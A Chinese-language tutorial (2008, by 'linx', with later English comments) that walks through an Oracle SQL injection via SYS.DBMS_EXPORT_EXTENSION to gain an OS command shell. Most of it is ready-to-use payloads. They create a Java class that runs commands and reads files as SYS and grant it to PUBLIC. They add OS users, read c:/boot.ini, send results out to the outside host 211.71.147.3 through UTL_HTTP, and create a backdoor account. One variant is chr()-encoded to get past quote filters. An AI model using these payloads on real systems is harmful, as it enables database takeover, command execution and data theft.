
实例演示oracle注入获取cmdshell的全过程

以下的演示都是在 web 上的 SQL*Plus 中执行的。在 web 注入时，把 select SYS.DBMS_EXPORT_EXTENSION..... 改成

  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)

的形式即可（用 'a'|| 是为了让整个条件恒为 true，与子查询返回什么无关）。语句有点长，可能要用 POST 提交。

注意：本文依赖的是 SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES 中的 PL/SQL 注入漏洞，Oracle 已在 2006 年的 Critical Patch Update 中修复，只对未打补丁的老版本（8i～10g R2）有效。另外第 1 步要创建 Java 存储过程，需要数据库装有 Oracle JVM 组件（例如 Express Edition 就不带）。
以下是各个步骤：
1. 创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，以 SYS 身份在 Oracle 中创建 Java 源 LinxUtil，里面两个静态方法：runCMD 用于执行系统命令（只回收标准输出，不含 stderr），readFile 用于读取文件：
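-- Step 1: abuse SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES (PL/SQL
-- injection in a SYS-owned package) to run DDL as SYS and create the Java
-- source "LinxUtil".  The Java class sits inside a 4x-quoted string literal,
-- hence the '''' around it.  The leading 'a'|| keeps the outer predicate true
-- no matter what the subquery returns.
--   runCMD(args)  : Runtime.exec(args) -- a single string, split on whitespace;
--                   returns only stdout, never stderr, and does not wait for exit.
--   readFile(name): returns the whole file as text.
--   Both return e.toString() instead of failing when an exception occurs.
-- NOTE(review): later payloads on this page use DBMS_OUTPUT".PUT(:P1); the
-- PUT(1) form here is not byte-identical to them.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as
import java.io.*;
public class LinxUtil extends Object {
  public static String runCMD(String args) {
    try {
      BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
      String stemp, str = "";
      while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
      myReader.close();
      return str;
    } catch (Exception e) {
      return e.toString();
    }
  }
  public static String readFile(String filename) {
    try {
      BufferedReader myReader = new BufferedReader(new FileReader(filename));
      String stemp, str = "";
      while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
      myReader.close();
      return str;
    } catch (Exception e) {
      return e.toString();
    }
  }
}'''';END;'';END;--','SYS',0,'1',0) from dual
)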
------------------------
如果 URL 有长度限制，可以把 readFile() 函数块去掉，即：
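-- Step 1 (short form): same injection as above but with only runCMD, for
-- targets that cap the URL length.  runCMD returns stdout only (no stderr)
-- and e.toString() on any exception.  Drop the LinxReadFile statements from
-- the later steps when this variant is used.
/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace and compile java source named "LinxUtil" as
import java.io.*;
public class LinxUtil extends Object {
  public static String runCMD(String args) {
    try {
      BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));
      String stemp, str = "";
      while ((stemp = myReader.readLine()) != null) str += stemp + "\n";
      myReader.close();
      return str;
    } catch (Exception e) {
      return e.toString();
    }
  }
}'''';END;'';END;--','SYS',0,'1',0) from dual
)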
同时把后面步骤中对 readFile() / LinxReadFile 的处理语句去掉。
------------------------------
2. 赋 Java 权限
注意：这一步把 java.io.FilePermission <<ALL FILES>> execute 授给了 PUBLIC，也就是库里所有账号都获得了通过 Java 执行任意文件的能力；这是持久的实例级变更，第 7 步的 drop function 不会把它撤销。
+ H. o" g, o& g3 ?! iselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual/ y9 b1 S+ m+ `3 A0 o- u6 e
3. 创建函数（PL/SQL 包装函数，把 SQL 调用映射到上面的 Java 静态方法；两个函数都建在 SYS 下）
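-- Step 3: PL/SQL call specs that expose the Java methods to SQL.  Both are
-- created in the SYS schema (the injection runs as SYS) and return the Java
-- String as VARCHAR2 -- so their output is capped at VARCHAR2 size limits.
-- The 8 quotes around the Java signature are a 1-quote literal nested
-- three levels deep.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual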
4. 赋 PUBLIC 执行函数的权限（注意：grant all ... to public 意味着任何能连上这个库的账号都可以调用这个 shell；清理时必须一并处理）
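-- Step 4: make the two SYS functions callable by everyone.  After this any
-- session with CREATE SESSION can run OS commands as the Oracle service
-- account -- this is the part a defender should hunt for (grants to PUBLIC
-- on SYS-owned objects named LINX*).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual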
5. 测试上面的几步是否成功（布尔盲注确认对象已创建：子查询查不到时返回 NULL，'1'<>NULL 为 UNKNOWN，页面表现为 false）
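-- Step 5: boolean checks that the call specs now exist.  Compare '1'
-- directly against the subquery: when the object is missing the subquery is
-- NULL, '1'<>NULL is UNKNOWN and the page behaves as "false".
-- Fix: the original first check was  '1'<>'11'||(...) , which is true even
-- when the subquery is NULL ('11'||NULL = '11', and '1'<>'11'), so it could
-- never report failure.  Both checks now use the plain comparison.
and '1'<>(
select OBJECT_ID from all_objects where object_name = 'LINXRUNCMD'
)
and '1'<>(
select OBJECT_ID from all_objects where object_name = 'LINXREADFILE'
)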
6. 执行命令（下面的例子是 Windows 上的 cmd.exe；Linux 下要换成对应的 shell 命令。命令以 Oracle 服务进程的 OS 账号身份执行，能否成功添加系统用户取决于该账号的权限）：
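-- Step 6: call the PUBLIC-granted SYS functions from the injection point.
-- Both return VARCHAR2, so the comparison must be against the string '1'
-- (see the note below the block).  runCMD yields stdout only; a failure
-- inside Java comes back as the exception text, not as an error.
-- The commands are Windows-specific (cmd.exe, c:/boot.ini); the OS user is
-- created with whatever rights the Oracle service account has.
/xxx.jsp?id=1 and '1'<>(
select sys.LinxRunCMD('cmd /c net user linx /add') from dual
)
/xxx.jsp?id=1 and '1'<>(
select sys.LinxReadFile('c:/boot.ini') from dual
)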
  
注意 sys.LinxReadFile() 返回的是 varchar 类型，不能用 "and 1<>" 代替 "and '1'<>"（数字和非数字字符串比较会触发 ORA-01722 invalid number）。
如果要查看运行结果可以用 union（列数和各列类型要和原查询一致，否则会报错）：
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual/ z- \* |/ f  E3 q$ s
或者用 UTL_HTTP.request 把结果带外发到自己控制的服务器（需要数据库账号有 UTL_HTTP 执行权限、数据库主机能出站访问；11g 及以后还需要配置网络 ACL）：
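-- Out-of-band retrieval: ship the result to an HTTP collector you control
-- (211.71.147.3 is the original author's host -- replace it).  Needs EXECUTE
-- on UTL_HTTP and outbound network access from the DB host (plus a network
-- ACL on 11g and later).
-- Fix: Oracle SQL has no backslash escapes -- '\n' is the two characters
-- \ and n, so the original REPLACE never matched the newlines LinxUtil
-- emits.  chr(10) is the newline.  Only space and newline are escaped here;
-- other reserved characters in the output can still break the request
-- (the note below suggests base64 for that).  The second request is tagged
-- LinxReadFile (the original mislabelled it LinxRunCMD).
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),chr(10),'%0A')) FROM dual
)
/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxReadFile:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),chr(10),'%0A')) FROM dual
)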
注意：用 UTL_HTTP.request 时，要用 REPLACE() 把空格、换行符替换掉，否则无法提交 http request。Oracle SQL 里 '\n' 是反斜杠加 n 两个字面字符，不是换行，换行要写成 chr(10)。也可以用 utl_encode.base64_encode，但它的输入输出都是 RAW，需要配合 utl_raw.cast_to_raw / utl_raw.cast_to_varchar2 使用。
--------------------
7. 内部变化
通过以下命令可以查看 all_objects 表的改变：
5 k( c- {: M; o3 p( o- \, I0 f! n5 @. mselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
8. 删除我们创建的函数（注意：原文只删了 LinxRunCMD，LinxReadFile、Java 源 "LinxUtil"、给 PUBLIC 的 grant 以及第 2 步授给 PUBLIC 的 Java 权限都还留在库里，下面一并清理）
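-- Step 8: remove what was created.  The original page dropped only
-- LinxRunCMD; the other artifacts are dropped here too so the instance is not
-- left with a PUBLIC-callable shell.  Dropping the functions also removes
-- their PUBLIC grants; the PUBLIC Java permission from step 2 does not go
-- away with them and is revoked in the last statement.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop function LinxReadFile  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop java source "LinxUtil"  '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.revoke_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual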
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
2008.1.12
linyujian@bjfu.edu.cn
======================================================================
测试漏洞的另一方法：
创建 Oracle 帐号（只是验证漏洞是否存在的标记，密码是硬编码的，测完务必删掉）：
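-- Vulnerability check, variant 2: create a marker account as SYS.  The
-- password is hard-coded and the account has no privileges yet; it is only
-- evidence that the injection ran.  Remove it when done (see below).
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual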
即（用 chr() 拼接字符串以绕过对引号的过滤。注意这个版本解码后用的是 DBMS_OUTPUT".PUT(:P1)，与上面 PUT(1) 的写法并不完全相同）：
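-- Same CREATE USER payload with every string built from chr(), for injection
-- points that filter quotes.  Decoded, the third argument is:
--   DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE 'DECLARE PRAGMA AUTONOMOUS_TRANSACTION;
--   BEGIN EXECUTE IMMEDIATE ''CREATE USER linxsql IDENTIFIED BY linxsql'';END;';END;--
-- (quotes are single here because nothing is nested in a string literal),
-- the first two are FOO / BAR, the fourth SYS and the sixth '1'.
-- Note it uses the :P1 bind form, unlike the PUT(1) payloads above.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual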
确定漏洞存在（账号建成则子查询返回 user_id，条件为 true；否则返回 NULL，条件为 UNKNOWN/false）：
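-- Boolean check for the marker account.  user_id is numeric, so comparing
-- against the number 1 is fine here; a missing account yields NULL and the
-- predicate is UNKNOWN (false).
1<>(
select user_id from all_users where username = 'LINXSQL'
)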
给 linxsql 连接权限（CONNECT 角色，使该账号可以登录）：
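-- Give the marker account the CONNECT role so it can log in.  Any such grant
-- is a persistent change that should be reverted together with the account.
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual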
删除帐号（这个 payload 用的是 PUT(:P1) 的写法）：
9 F7 M5 L0 B8 ^( c3 `6 v2 W$ hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''( C% B$ F0 d# f( |: Z6 A# l6 h
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual * t; t+ C) Z: t, `5 I
======================
以下方法创建一个可以执行任意语句的函数 Linx_query()，执行成功的话返回数值 1。但它声明为 authid current_user（调用者权限），通过 web 应用注入时只拥有应用账号的权限，而不是 SYS 的权限，所以作用似乎不大；真要用的话可以考虑先 grant dba to 当前用户。另外，从 SELECT 里调用的函数不能执行 DDL（会报 ORA-14552），除非把函数声明成自治事务。
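-- Invoker-rights (authid current_user) helper: runs whatever statement is
-- passed in and returns 1.  Because it is invoker-rights, calling it from the
-- web application's session only yields that session's privileges, not SYS's
-- -- which is why the page finds it of limited use.  DDL inside a function
-- invoked from a SELECT also raises ORA-14552 unless the function is an
-- autonomous transaction.  Note this payload uses the :P1 bind form.
-- (The original page had a truncated duplicate of this payload after the
-- function body; it is omitted here.)
1.jsp?id=1 and '1'<>(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
)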